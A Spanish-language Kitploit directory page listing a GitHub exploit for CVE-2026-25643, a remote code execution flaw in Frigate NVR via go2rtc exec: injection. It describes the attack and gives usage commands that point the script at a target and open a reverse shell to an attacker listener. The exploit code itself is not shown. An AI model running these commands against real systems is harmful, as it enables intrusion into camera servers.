Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-25643-Frigate-RCE — Exploit para RCE autenticado en Frigate NVR mediante inyección de protocolo exec: en go2rtc, automatizando la ejecución de comandos del sistema y la captura de shell inversa. | Kitploit
Herramientas/GitHubGitHub/jduardo2704/cve-2026-25643-frigate-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubjduardo2704/cve-2026-25643-frigate-rce

CVE-2026-25643-Frigate-RCE

Exploit para RCE autenticado en Frigate NVR mediante inyección de protocolo exec: en go2rtc, automatizando la ejecución de comandos del sistema y la captura de shell inversa.

Ver Repositorio
33hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-25643: Frigate NVR <= 0.16.3 RCE autenticado

Título del Exploit: Frigate NVR <= 0.16.3 - Ejecución remota de código autenticada
Fecha: 2026-02-05
Autor del Exploit: jduardo2704
Página del proveedor: https://frigate.video/
Enlace del software: https://github.com/blakeblackshear/frigate
Versión: <= 0.16.3
CVE: CVE-2026-25643 Aviso: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

Descripción

Las versiones de Frigate hasta la 0.16.3 son vulnerables a la ejecución remota de código (RCE) a través de la configuración de go2rtc. Un atacante con acceso autenticado (o sin autenticar si la instancia está expuesta) puede inyectar comandos del sistema en la configuración de la transmisión usando el protocolo exec:. Este exploit automatiza la inyección del payload, reinicia el servicio y captura la reverse shell.

Instalación

root@kitploit:~
pip install requests pyyaml

Uso

Modo autenticado:

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444

Modo no autenticado (si está expuesto):

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444

Descargo de responsabilidad

Este script es solo para fines educativos y pruebas de seguridad autorizadas.

Descargar herramienta